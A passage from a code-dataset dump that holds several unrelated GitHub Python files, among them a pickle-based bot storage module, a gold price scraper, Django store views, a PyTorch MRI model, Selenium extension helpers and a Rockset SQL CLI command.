handlers.\"\"\"\n\n def __init__(self, handlers=list()):\n self.handlers = handlers\n\n def addHandler(self, handler):\n self.handlers.append(handler)\n\n def closeAll(self):\n \"\"\"To be called when all handlers need to be closed.\n\n Intended use case is overall program shutdown.\n \"\"\"\n\n for handler in self.handlers:\n if not handler.close():\n log.warning(\"StorageController::closeAll(): skipping over \"\n \"handler %s because it failed to close cleanly. Look up log lines \"\n \"before this one for possible indications why that happened.\",\n handler)\n\n\nclass StorageHandler(object):\n \"\"\"Base class. Children take care of specific ``StorageContainer``s.\n\n Handlers for \"ephemeral/volatile\" containers may not need take care of\n closing them down. This is needed for persistent storage handlers, though.\n\n Children should minimally implement\n * attachContainer()\n * detachContainer()\n * close()\n \"\"\"\n\n def __init__(self):\n self.containers = list()\n\n def attachContainer(self, container):\n \"\"\"Attach a new container (e.g. a single-pickle-file-container)\"\"\"\n\n self.containers.append(container)\n\n def detachContainer(self, container):\n \"\"\"Detach a particular container from handler\"\"\"\n\n matches = []\n for i, c in enumerate(self.containers):\n if c == container: # equivalence based on id()\n matches.append(i)\n for i in reversed(matches): # (in case of duplicates)\n self.containers.pop(i)\n # base ``StorageHandler`` doesn't care about the eventual fate\n # of its ``StorageContainer``s.\n\n def close(self):\n \"\"\"Close down this whole handler\"\"\"\n\n not_clean = False\n # create a shallow copy of the list of containers: since we may be popping\n # them from the list as we are processing it, we need to do this.\n for container in list(self.containers):\n ret = self.detachContainer(container)\n if not ret:\n not_clean = True\n return not not_clean\n\n\nclass PersistableStorageHandler(StorageHandler):\n \"\"\"Saves ``PersistableStorageContainer``s.\"\"\"\n\n APPEND_CLASS_NAME = False\n APPEND_SUFFIX = True\n DEFAULT_SUFFIX = \"state.gz\"\n\n def __init__(self, storage_suffix=None):\n super(PersistableStorageHandler, self).__init__()\n\n if not storage_suffix and self.APPEND_SUFFIX:\n storage_suffix = self.DEFAULT_SUFFIX\n self.storage_suffix = storage_suffix\n\n def formatFilenameFor(self, container, name):\n filename = name + \"%s%s\" % (\n \".\" + container.__class__.__name__ if self.APPEND_CLASS_NAME else \"\",\n \".\" + self.storage_suffix if self.storage_suffix else \"\")\n return filename\n\n def loadContainer(self, container, name):\n \"\"\"Try loading container data from storage.\n\n PersistableStorageContainer::loadContainer() method uses simple gzip +\n pickle load.\n \"\"\"\n\n if not name:\n return False\n filename = self.formatFilenameFor(container, name)\n if not os.path.isfile(filename):\n return False\n\n try:\n loaded = gpLoad(filename)\n container.__dict__.update(loaded.__dict__)\n except:\n return False\n return True\n\n def saveContainer(self, container, name):\n \"\"\"Try saving container data into persistent storage.\n\n PersistableStorageContainer::saveContainer() method uses simple gzip +\n pickle dump.\n \"\"\"\n\n if not name:\n return False\n filename = self.formatFilenameFor(container, name)\n\n try:\n gpDump(container, filename)\n except Exception as e:\n log.warning(\"Failed to persist container \\\"%s\\\". 
Error: %s\", name, e)\n return False\n return True\n\n def addContainer(self, name, try_to_load=True, **initial_attributes):\n container = PersistableStorageContainer(name)\n self.attachContainer(container, try_to_load=try_to_load, **initial_attributes)\n return container\n\n def attachContainer(self, container, try_to_load=True, **initial_attributes):\n super(PersistableStorageHandler, self).attachContainer(container)\n\n name = container._container_name # all PersistableStorageContainer\n # children will have this attribute\n\n if try_to_load and name: # can't load from storage without a name\n if not self.loadContainer(container, name):\n log.info(\"Couldn't load persistable container \\\"%s\\\" from storage - \"\n \"continuing.\", name)\n for k, v in initial_attributes.iteritems():\n setattr(container, k, v) # only initialize attrs if failed to load\n else:\n log.info(\"Loaded persistable container \\\"%s\\\" from storage\", name)\n\n def detachContainer(self, container, try_to_save=True):\n name = container._container_name\n log.debug(\"Detaching container \\\"%s\\\"...\", name if name else \"[no name]\")\n\n ret_val = True\n if try_to_save and name:\n if not self.saveContainer(container, name):\n log.warning(\"Couldn't save persistable container \\\"%s\\\" to storage. \"\n \"This is unexpected.\", name)\n ret_val = False\n else:\n log.info(\"Saved persistable container \\\"%s\\\"\", name)\n\n super(PersistableStorageHandler, self).detachContainer(container)\n\n return ret_val # if we weren't supposed to attempt a save, return True, too\n\n def close(self):\n return super(PersistableStorageHandler, self).close()\n\n\nclass StorageContainer(object):\n \"\"\"Base class for things that store some bot data/state.\"\"\"\n pass\n\n\nclass PersistableStorageContainer(StorageContainer):\n \"\"\"Generic serializable/persistable-container class.\"\"\"\n\n def __init__(self, name=None):\n super(PersistableStorageContainer, self).__init__()\n\n self._container_name = name\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"wfn/twidibot","sub_path":"twidibot/bot_storage.py","file_name":"bot_storage.py","file_ext":"py","file_size_in_byte":5905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11755289430","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import date\nimport pandas as pd\nfrom dagster import solid,OutputDefinition\nimport dagster_pandas as dp\n\ndaily_buying_price_df_for_gold = dp.create_dagster_pandas_dataframe_type(\n name=\"daily_buying_price_df_for_gold\",\n columns=[\n dp.PandasColumn.string_column(\"date\"),\n dp.PandasColumn.string_column(\"buying_price\")\n ],\n)\n\n@solid(output_defs=[OutputDefinition(name=\"daily_buying_price_df_for_gold\", dagster_type=daily_buying_price_df_for_gold)])\ndef download_contents_as_df(context,start_date : str , end_date : str) -> pd.DataFrame:\n date_price_list = []\n date_range_list_formatted = list(map(\n lambda x : {'date_for_url' : x.strftime('%Y/%m/%d'),'date_for_output' : x.strftime('%Y-%m-%d')}\n ,pd.date_range(start_date,end_date).to_pydatetime().tolist()\n ))\n for dt in date_range_list_formatted:\n headers = { \n 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0',\n 'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'\n }\n link = 'https://altin.in/arsiv/{date}'.format(\n date=dt['date_for_url']\n )\n content = requests.get(link , headers = headers).text\n soup = 
BeautifulSoup(content,features='html.parser')\n price = soup.find_all('li',{'title': 'Gram Altın - Alış'})[0].text\n date_price_list.append({ 'date' : dt['date_for_output'] , 'buying_price' : price })\n return pd.DataFrame(date_price_list)\n","repo_name":"msen92/personal_investment_insights","sub_path":"pipelines/extraction/scraping/altinin_scraper.py","file_name":"altinin_scraper.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4323031848","text":"\"\"\"\nSegments Module\n----\n- Manages operation of segmented displays\n---\n\"\"\"\n\nfrom controller import communication as comm\n\ndef transmit_text(text: str):\n \"\"\"transmits text to segmented display\"\"\"\n comm.transmit(\"t\"+text, comm.ser_score)\n\ndef transmit_score(score: int):\n \"\"\"transmits score to segmented display\"\"\"\n data = \"\"\n if score == 0:\n data = \" \"\n else:\n data = str(score)\n length = len(data)\n if length < 8:\n data = \" \"*(8-length) + data\n comm.transmit(\"s\"+data, comm.ser_score)\n","repo_name":"Hydrantz/leds_screen","sub_path":"leds_screen/screen/segmented.py","file_name":"segmented.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38403914215","text":"\nimport rclpy\nfrom rclpy.node import Node\nfrom rclpy.qos import QoSProfile\nfrom std_msgs.msg import String\n\n\nclass HelloworldSubscriber(Node):\n\n def __init__(self):\n super().__init__('Helloworld_subscriber')\n qos_profile = QoSProfile(depth=10)\n self.helloworld_subscriber = self.create_subscription(\n String,\n 'helloworld',\n self.subscribe_topic_message,\n qos_profile)\n\n def subscribe_topic_message(self, msg):\n self.get_logger().info('Received message: {0}'.format(msg.data))\n\n\ndef main(args=None):\n rclpy.init(args=args)\n node = HelloworldSubscriber()\n try:\n rclpy.spin(node)\n except KeyboardInterrupt:\n node.get_logger().info('Keyboard Interrupt (SIGINT)')\n finally:\n node.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"benthebear93/Smallstep_mobile_manipulator","sub_path":"ssmm_core/ssmm_core/helloworld_subscriber.py","file_name":"helloworld_subscriber.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"20944254019","text":"from datetime import datetime\nimport xarray as xr\n\nfrom cfxarray.attributes import (\n LatitudeAttrs,\n LongitudeAttrs,\n DepthAttrs,\n TimeAttrs,\n)\nfrom typing import List\nfrom dataclasses import asdict, dataclass\nfrom functools import partial\nfrom cfxarray.dims import DEPTH, DIMLESS\nfrom cfxarray.base import dataset\n\n@dataclass\nclass DepthCoords:\n depth: xr.Variable\n time: xr.Variable\n longitude: xr.Variable\n latitude: xr.Variable\n\n\ndef depthcoords(\n depth: List[float],\n time: datetime,\n longitude: float,\n latitude: float,\n):\n return asdict(\n DepthCoords(\n depth=xr.Variable(DEPTH, depth, asdict(DepthAttrs())),\n time=xr.Variable(DIMLESS, time, asdict(TimeAttrs())),\n longitude=xr.Variable(DIMLESS, longitude, asdict(LongitudeAttrs())),\n latitude=xr.Variable(DIMLESS, latitude, asdict(LatitudeAttrs())),\n )\n )\n\nprofiledataset = partial(dataset, \"profile\", 
\"profile_name\")\n","repo_name":"NIVANorge/s-enda-playground","sub_path":"hello-xarray/cfxarray/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4916523952","text":"from django.shortcuts import render\nfrom store.serializers import ProduitSerializer\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom store.models import Produit,Categorie\nfrom django.shortcuts import render,get_object_or_404\nfrom rest_framework import status\nfrom datetime import datetime\n\n\n@api_view(['GET'])\ndef getProduits(request):\n query = request.query_params.get('keyword')\n if query == None:\n query = ''\n\n produits = Produit.objects.filter(\n nom__icontains=query).order_by('-date_creation')\n\n page = request.query_params.get('page')\n paginator = Paginator(produits, 5)\n\n try:\n produits = paginator.page(page)\n except PageNotAnInteger:\n produits = paginator.page(1)\n except EmptyPage:\n produits = paginator.page(paginator.num_pages)\n\n if page == None:\n page = 1\n\n page = int(page)\n print('Page:', page)\n serializer = ProduitSerializer(produits, many=True)\n return Response({'produits': serializer.data, 'page': page, 'pages': paginator.num_pages})\n \nclass ProduitDetails(APIView):\n def get(self,request,pk):\n produit=get_object_or_404(Produit,pk=int(pk))\n data=ProduitSerializer(produit).data\n return Response(data)\n\n\nclass Promo(APIView):\n def get(self,request):\n \n produits=Produit.objects.filter(promotion=True)\n\n page = request.query_params.get('page')\n paginator = Paginator(produits, 5)\n\n try:\n produits = paginator.page(page)\n except PageNotAnInteger:\n produits = paginator.page(1)\n except EmptyPage:\n produits = paginator.page(paginator.num_pages)\n\n if page == None:\n page = 1\n\n page = int(page)\n print('Page:', page)\n serializer = ProduitSerializer(produits, many=True)\n return Response({'produits': serializer.data, 'page': page, 'pages': paginator.num_pages})\n\n@api_view(['GET'])\ndef getNouveau(request):\n produits = Produit.objects.all().order_by('-date_creation')[0:5]\n serializer = ProduitSerializer(produits, many=True)\n return Response(serializer.data)\n\n@api_view(['POST'])\n@permission_classes([IsAdminUser])\ndef ajouterProduit(request):\n data=request.data\n categorie=Categorie.objects.get(name=data['categorie'])\n produit = Produit.objects.create(\n nom=data['nom'],\n ref=data['ref'],\n description=data['description'],\n categorie=categorie ,\n marque=data['marque'],\n tva=data['tva'],\n promotion=data['promotion'],\n prix=data['prix'],\n prix_promo=data['prix_promo'],\n commentaire=data['commentaire'],\n \n )\n\n serializer = ProduitSerializer(produit, many=False)\n return Response(serializer.data)\n\n\n@api_view(['PUT'])\n@permission_classes([IsAdminUser])\ndef modifierProduit(request, pk):\n data = request.data\n\n produit = Produit.objects.get(id=str(pk))\n serializer = ProduitSerializer(produit, data=data)\n\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['DELETE'])\n@permission_classes([IsAdminUser])\ndef supprimerProduit(request, pk):\n produit = 
Produit.objects.get(id=int(pk))\n produit.delete()\n return Response('Produit Supprimé')\n\n@api_view(['POST'])\ndef uploadImage(request):\n data = request.data\n\n produit_id = data['id']\n produit = Produit.objects.get(id=int(produit_id))\n\n produit.image = request.FILES.get('image')\n produit.save()\n\n return Response('Image was uploaded')\n\n@api_view(['GET'])\ndef getProm(request):\n produits=Produit.objects.filter(promotion=True)\n serializer = ProduitSerializer(produits, many=True)\n return Response(serializer.data)\n","repo_name":"SMJB4015/EPI-BACKEND","sub_path":"store/views/produit_views.py","file_name":"produit_views.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74293668489","text":"# Задание-4.\n#\n# Описание:\n#\n# 4. Начните работу над проектом «Склад оргтехники».\n# Создайте класс, описывающий склад.\n# А также класс «Оргтехника», который будет базовым для классов-наследников.\n# Эти классы — конкретные типы оргтехники (принтер, сканер, ксерокс).\n# В базовом классе определить параметры, общие для приведенных типов.\n# В классах-наследниках реализовать параметры, уникальные для каждого типа оргтехники.\n#\n# .\n\n\n\"\"\n\nfrom abc import ABC, abstractmethod\n\nclass InitClass:\n склад_номер = str\n размещение_ряд = int\n размещение_полка = str\n размещение_место= int\n серийный_номер = int\n производитель_наименование = str\n производитель_страна = str\n бренд_наименование = str\n поставщик_наименование = str\n\n\nclass Warehouse(ABC):\n\n @abstractmethod\n def storehouse(self):\n pass\n\n\nclass Printer(Warehouse,InitClass):\n def __init__(self):\n self.тип_принтера = [\"струйный\",\"лазерный\",\"матричны\",\"3D-принтер\"]\n self.модель_номер = str\n self.модель_наименование = str\n\nclass Scaner(Warehouse,InitClass):\n def __init__(self):\n self.тип_сканера = [\"ручной\",\"планшетный\",\"потоковый\",\"сканер_штрих_код\"]\n self.модель_номер = str\n self.модель_наименование = str\n\nclass Xerox(Warehouse,InitClass):\n def __init__(self):\n self.тип_ксерокса = [\"портативный\",\"Лазерный_МФУ\",\"Струйный_МФУ\"]\n self.модель_номер = str\n self.модель_наименование = str\n\n\n","repo_name":"YRQbit/GBPython","sub_path":"lesson_8/example_4_v1.py","file_name":"example_4_v1.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"48075507840","text":"# You are given the root of a binary tree. Find the level for the binary tree with the\n# minimum sum, and return that value.\n\n# For instance, in the example below, the sums of the trees are 10, 2 + 8 = 10, and\n# 4 + 1 + 2 = 7. 
So, the answer here should be 7.\n\nclass Node:\n def __init__(self, value, left=None, right=None):\n self.val = value\n self.left = left\n self.right = right\n\n\ndef minimum_level_sum(root, level):\n if root.left:\n minimum_level_sum(root.left, level+1)\n if root.right:\n minimum_level_sum(root.right, level+1)\n if level in score:\n score[level] += root.val\n else:\n score[level] = root.val\n\n if level == 0:\n print(score[min(score, key=score.get)])\n\n\n# 10\n# / \\\n# 2 8\n# / \\ \\\n# 4 1 2\nnode = Node(10)\nnode.left = Node(2)\nnode.right = Node(8)\nnode.left.left = Node(4)\nnode.left.right = Node(1)\nnode.right.right = Node(2)\n\nscore = {}\n\nminimum_level_sum(node, 0)\n","repo_name":"Agrotir/Python-Practice","sub_path":"Binary Tree Level with Minimum Sum/Binary_Tree_Level_with_Minimum_Sum.py","file_name":"Binary_Tree_Level_with_Minimum_Sum.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13989918158","text":"import math\nfrom collections import OrderedDict\nimport torch\nfrom torch import nn\nfrom einops import rearrange, repeat\nfrom einops.layers.torch import Rearrange, Reduce\n\nfrom ._core_fes import dict_fes\n\n\nclass MRCnnFc(nn.Module):\n def __init__(self, config, path_weights):\n super(MRCnnFc, self).__init__()\n self.config = config\n if self.config[\"debug\"]:\n print(\"Config at model init\", self.config)\n self.vs = dict()\n\n t_fe = dict_fes[self.config[\"fe\"][\"arch\"]](\n pretrained=self.config[\"fe\"][\"pretrained\"])\n if self.config[\"fe\"][\"with_gap\"]:\n # Exclude trailing FC layer\n t_fe = list(t_fe.children())[:-1]\n else:\n # Exclude trailing GAP and FC layers\n t_fe = list(t_fe.children())[:-2]\n self._fe = nn.Sequential(*t_fe)\n\n if self.config[\"fe\"][\"dropout\"]:\n self._fe_drop = nn.Dropout2d(p=self.config[\"fe\"][\"dropout\"])\n else:\n self._fe_drop = nn.Identity()\n\n if self.config[\"debug\"]:\n print(\"FE submodel\", self._fe)\n\n self.vs[\"num_slices\"] = self.config[\"input_size\"][0][2]\n if self.config[\"downscale\"]:\n self.vs[\"num_slices\"] = round(self.vs[\"num_slices\"] *\n self.config[\"downscale\"][0][2])\n\n if self.config[\"fe\"][\"arch\"] in (\"resnet18\", \"resnet34\"):\n self.vs[\"fe_out_ch\"] = 512\n elif self.config[\"fe\"][\"arch\"] == \"resnet50\":\n self.vs[\"fe_out_ch\"] = 2048\n else:\n raise ValueError(f\"Unsupported `model.fe.arch`\")\n\n if self.config[\"fe\"][\"with_gap\"]:\n self.vs[\"fe_out_spat\"] = (1, 1)\n else:\n if self.config[\"input_size\"][0][0] == 320:\n self.vs[\"fe_out_spat\"] = (5, 5)\n else:\n msg = \"Unspecified `model.fe` output shape for given `model.input_size`\"\n raise ValueError(msg)\n\n if self.config[\"agg\"][\"kind\"] == \"concat\":\n self._agg = nn.Sequential(*[\n Rearrange(\"(b s) ch d0 d1 -> b (s ch d0 d1)\", s=self.vs[\"num_slices\"]),\n nn.Linear(self.vs[\"num_slices\"] *\n self.vs[\"fe_out_ch\"] *\n math.prod(self.vs[\"fe_out_spat\"]),\n self.config[\"agg\"][\"hidden_size\"]),\n nn.ReLU(),\n nn.Dropout(self.config[\"agg\"][\"dropout\"]),\n ])\n\n self._agg_fc = nn.Linear(self.config[\"agg\"][\"hidden_size\"],\n self.config[\"output_channels\"])\n elif self.config[\"agg\"][\"kind\"] == \"avg_pool\":\n self._agg = nn.Sequential(*[\n Rearrange(\"(b s) ch d0 d1 -> b s ch d0 d1\", s=self.vs[\"num_slices\"]),\n Reduce(\"b s ch d0 d1 -> b ch d0 d1\", reduction=\"mean\"),\n Rearrange(\"b ch d0 d1 -> b (ch d0 d1)\"),\n nn.Dropout(self.config[\"agg\"][\"dropout\"]),\n ])\n\n self._agg_fc = 
nn.Linear(self.vs[\"fe_out_ch\"] *\n math.prod(self.vs[\"fe_out_spat\"]),\n self.config[\"output_channels\"])\n else:\n raise ValueError(f\"Unsupported `model.agg.kind`\")\n\n if self.config[\"restore_weights\"]:\n self.load_state_dict(torch.load(path_weights))\n\n def _debug_tensor_shape(self, tensor, name=\"\"):\n if self.config[\"debug\"]:\n print(f\"Shape of {name} is\", tensor.size())\n\n def forward(self, input):\n \"\"\"\n input : (B, CH, R, C, S)\n\n Notes:\n B - batch, CH - channel, R - row, C - column, S - slice/plane, F - feature\n \"\"\"\n endpoints = OrderedDict()\n\n self._debug_tensor_shape(input, \"input\")\n\n tmp_in = rearrange(input, \"b ch r c s -> (b s) ch r c\")\n tmp_in = repeat(tmp_in, \"bs ch r c -> bs (k ch) r c\", k=3)\n self._debug_tensor_shape(tmp_in, \"proc in\")\n\n res_fe = self._fe(tmp_in)\n self._debug_tensor_shape(res_fe, \"FE out\")\n\n res_agg = self._agg(res_fe)\n self._debug_tensor_shape(res_agg, \"AGG out\")\n\n res_out = self._agg_fc(res_agg)\n self._debug_tensor_shape(res_out, \"AGG FC out\")\n\n endpoints[\"main\"] = res_out\n return endpoints\n","repo_name":"Oulu-IMEDS/OAProgressionMR","sub_path":"oaprmr/models/_mr_cnn_fc.py","file_name":"_mr_cnn_fc.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"41231749820","text":"import random\n\nimport numpy as np\n\nfrom model.support_vector_machine import Support_Vector_Machine\nfrom utils.utils import read_data\nfrom model.kernel_func import Poly_Kernel\nimport model.kernel_func as kf\nfrom utils.draw import draw_div_line\n\n\ndef generate_data():\n with open('../data/data.csv', 'w') as fd:\n for _ in range(0, 100):\n x = random.random() * 10\n y = random.random() * 10\n if y > 0.8 * x * x - 7.2 * x + 19:\n label = 0\n fd.write(str(x) + ',' + str(y) + ',' + str(label) + '\\n')\n elif y < 0.8 * x * x - 7.2 * x + 15:\n label = 1\n fd.write(str(x) + ',' + str(y) + ',' + str(label) + '\\n')\n\n with open('../data/test.csv', 'w') as fd:\n for _ in range(0, 100):\n x = random.random() * 10\n y = random.random() * 10\n if y > 0.8 * x * x - 7.2 * x + 19:\n label = 0\n fd.write(str(x) + ',' + str(y) + ',' + str(label) + '\\n')\n elif y < 0.8 * x * x - 7.2 * x + 15:\n label = 1\n fd.write(str(x) + ',' + str(y) + ',' + str(label) + '\\n')\n\n\ndef run_svm():\n svm = Support_Vector_Machine(max_round=20, kernel_func=kf.Gauss_Kernel(sigma=1))\n data, label, dtype = read_data(\"../data/data.csv\", \"../data/type.csv\")\n\n svm.train(data, label)\n\n label = np.array([-1 if i == 0 else 1 for i in label])\n draw_div_line(data, label, min_x=-5, max_x=15, min_y=-5, max_y=15, query=svm.query, sv=svm.sv)\n t_data, t_label, dtype = read_data(\"../data/test.csv\", \"../data/type.csv\")\n cnt = 0\n for x, y in zip(t_data, t_label):\n out = svm.query(x)\n print('query sample : {} - {}'.format(x, y))\n if y == 0 and out < 0:\n cnt += 1\n print(' out {} RIGHT!!!\\n'.format(out))\n elif y == 1 and out > 0:\n cnt += 1\n print(' out {} RIGHT!!!\\n'.format(out))\n else:\n print(' out {} WRONG!!!\\n'.format(out))\n print('query done! 
right : {}, total : {}, acc : {}\\n'.format(cnt, t_label.shape[0], cnt / t_label.shape[0]))\n\n\nif __name__ == '__main__':\n # generate_data()\n data, label, dtype = read_data(\"../data/data.csv\", \"../data/type.csv\")\n label = np.array([-1 if i == 0 else 1 for i in label])\n draw_div_line(data, label, -5, 15, -5, 15)\n run_svm()\n","repo_name":"Kalzncc/MachineLearningImpl","sub_path":"svm/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33441149267","text":"from __future__ import annotations\n\nfrom logging import getLogger\nfrom multiprocessing import Queue\nfrom typing import Any, List, Union, cast\n\nfrom dealwebpage.webpage import Page\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.firefox.webdriver import WebDriver\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom utils.logger import worker_configurer\n\nlogger = getLogger(__name__)\n\ndef configure_logger_for_use_extentions(queue_log: Queue[Any]):\n \"\"\"\n Loggerをセット\n logger の使い方が正しくないがゆえにここでセットしないといけない\n \"\"\"\n worker_configurer(queue_log, logger)\n\ndef get_watcher_window(driver: WebDriver, wait: WebDriverWait) -> Union[bool, int, str]:\n \"\"\"\n driverを取得した直後に呼ぶ\n Watcherタブ以外を消してWatcherタブを開く\n \"\"\"\n watcher_window = False\n logger.debug(\"Try to access extension page\")\n try:\n wait.until(expected_conditions.visibility_of_all_elements_located((By.ID, \"button\")))\n wait.until(expected_conditions.presence_of_element_located((By.ID, \"DoneAttachJS\")))\n except TimeoutException as err:\n print(f\"failed to access extension page by timeout: {err}\")\n return False\n except Exception as err:\n print(f'failed to access extension page: {err}')\n return False\n\n try:\n windows: list[Union[int, str]] = driver.window_handles\n for window in windows:\n driver.switch_to.window(window)\n title = driver.title\n if title == \"Watcher\":\n watcher_window = window\n else:\n # 不要なページを消す\n driver.close()\n except Exception as err:\n # 最悪、エラーが起きてもwatcher_windowがわかればよい\n pass\n\n try:\n driver.switch_to.window(watcher_window)\n except Exception as err:\n logger.exception(f\"Faild to switch extension page: {err}\")\n return False\n else:\n return watcher_window\n\ndef stop_watcher_and_get_data(driver: WebDriver, wait: WebDriverWait, watcher_window: Union[str, int], page: Page) -> bool:\n \"\"\"\n Watcher.htmlのStop Watchingボタンをクリック。\n 拡張機能が監視を終え、収集したデータを記録。\n \"\"\"\n logger.debug(\"Watcher: stop\")\n try:\n # watcher.htmlに移動してstopをクリック\n # クリックすると、Watcher.htmlのdivタグ(id=\"contents\")の中に、収集したデータを記録する\n driver.switch_to.window(watcher_window)\n wait.until(expected_conditions.visibility_of_element_located((By.ID, \"stop\")))\n elm = driver.find_element_by_id(\"stop\")\n elm.click()\n\n # contentsの最後の要素がDOMに現れるまで待つ\n wait.until(expected_conditions.presence_of_element_located((By.ID, \"EndOfData\")))\n\n # watcher.htmlのHTMLをpageインスタンスのプロパティに保存\n page.watcher_html = driver.page_source # type: ignore\n\n # clearContentsをクリック\n elm: Any = driver.find_element_by_id(\"clearContents\")\n elm.click()\n # 最後の要素が消えるまで待つ\n wait.until(expected_conditions.invisibility_of_element_located((By.ID, \"EndOfData\")))\n except Exception as err:\n logger.exception(f'{err}')\n return False\n else:\n logger.debug(\"Watcher: Get data from Watcher\")\n return True\n\n\ndef 
start_watcher_and_move_blank(driver: WebDriver, wait: WebDriverWait, watcher_window: Union[int, str], blank_window: str) -> bool:\n \"\"\"\n watcher.htmlのStart Watchingボタンをクリック。拡張機能が監視を始める\n \"\"\"\n logger.debug(\"Watcher: starting...\")\n try:\n driver.switch_to.window(watcher_window)\n wait.until(expected_conditions.visibility_of_element_located((By.ID, \"start\")))\n elm: Any = driver.find_element_by_id(\"start\")\n elm.click()\n driver.switch_to.window(blank_window)\n wait.until(lambda d: \"Watcher\" != driver.title) # type: ignore\n except Exception as err:\n logger.exception(f'{err}')\n return False\n else:\n return True\n\n\ndef rm_other_than_watcher(driver: WebDriver, wait: WebDriverWait, watcher_window: Union[str, int]) -> Union[int, str]:\n \"\"\"\n Watcherタブ以外を消してWatcherタブを開く\n \"\"\"\n logger.debug(\"rm_other_than_watcher...\")\n\n try:\n windows = driver.window_handles\n except Exception as err:\n logger.exception(f\"{err}\")\n return watcher_window\n\n windows = cast(List[Union[int, str]], windows)\n for window in windows:\n driver.switch_to.window(window)\n title = driver.title\n if title == \"Watcher\":\n watcher_window = window\n else:\n try:\n # 不要なページを消す\n logger.info(\"close some window\")\n driver.close()\n except Exception as err:\n logger.exception(f\"failed to close window {err}\")\n pass\n\n try:\n driver.switch_to.window(watcher_window)\n except Exception as err:\n logger.exception(f\"Faild to switch extension page: {err}\")\n pass\n\n logger.debug(\"rm_other_than_watcher... FIN\")\n return watcher_window\n","repo_name":"cysec-lab/crawler","sub_path":"src/webdrivers/use_extentions.py","file_name":"use_extentions.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6417906918","text":"\"\"\"Contains a Scraper objects that feed the list of crypto coins to the application\"\"\"\nimport configparser\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef extract_name(full_name: str, symbol: str) -> str:\n \"\"\"Due to the fact that the web page provides names that are combined with symbol name\n (without space in between), this function helps to extract the actual name of the coin\n based on the symbol string\"\"\"\n return full_name[len(symbol):]\n\n\nclass Scraper:\n\n def __init__(self):\n config = configparser.ConfigParser()\n config.read(\"config.ini\")\n self.url = config[\"scraper\"][\"url\"]\n\n self.soup = BeautifulSoup(self._get_html_text(), 'lxml')\n\n def _get_html_text(self):\n r = requests.get(self.url)\n\n return r.text\n\n def scrape_coin_names(self) -> list:\n result = []\n table = self.soup.find(\"tbody\")\n rows = table.find_all(\"tr\")\n for row in rows:\n cells = row.find_all(\"td\")\n full_name = cells[1].text\n symbol_str = cells[2].text\n name = extract_name(full_name, symbol_str)\n result.append(name)\n\n return result\n\n\n\n\n","repo_name":"AleksanderWWW/crypto_app","sub_path":"api_client/coinmarket_scraper.py","file_name":"coinmarket_scraper.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10105950900","text":"from .command_auth import AuthCommand\nfrom rockset.query import QueryStringSQLText\nimport sys\nimport time\n\n\nclass SQLQuery(AuthCommand):\n def usage(self):\n return \"\"\"\nusage: rock sql --help\n rock sql\n rock sql <sql_statement> [<args>...]\n\nRun a sql query and return results as documents.\n\narguments:\n 
<sql-statement> sql query to run; will read from STDIN if == '-'\n\nexamples:\n\n # To enter into the rock SQL REPL\n $ rock sql\n\n # To run a simple SQL query\n $ rock sql 'SELECT * from my_collection LIMIT 10'\n\n # To supply SQL from STDIN, use \"-\"\n $ echo 'SELECT * from my_collection LIMIT 10' | rock sql -\n\n \"\"\"\n\n def validate_args(self, pargs):\n allowed_args = ['drop_results']\n for arg in pargs['<args>']:\n if arg not in allowed_args:\n return False\n return True\n\n def go(self):\n if not self.sql_statement:\n try:\n from rockset_sqlcli.rscli.main import cli_main\n except (ImportError, FileNotFoundError) as e:\n raise ImportError(\n 'Python package rockset_sqlcli is not installed. '\n 'Please run `pip3 install rockset_sqlcli` and try again!'\n )\n return cli_main(\n api_server=self.api_server,\n api_key=self.api_key,\n workspace='commons',\n generate_warnings=self.warn,\n )\n elif self.sql_statement == '-':\n self.sql_statement = self.read_stdin('SQL query')\n q = QueryStringSQLText(self.sql_statement)\n\n # lets do this\n start = time.time()\n cursor = self.client.sql(q=q, 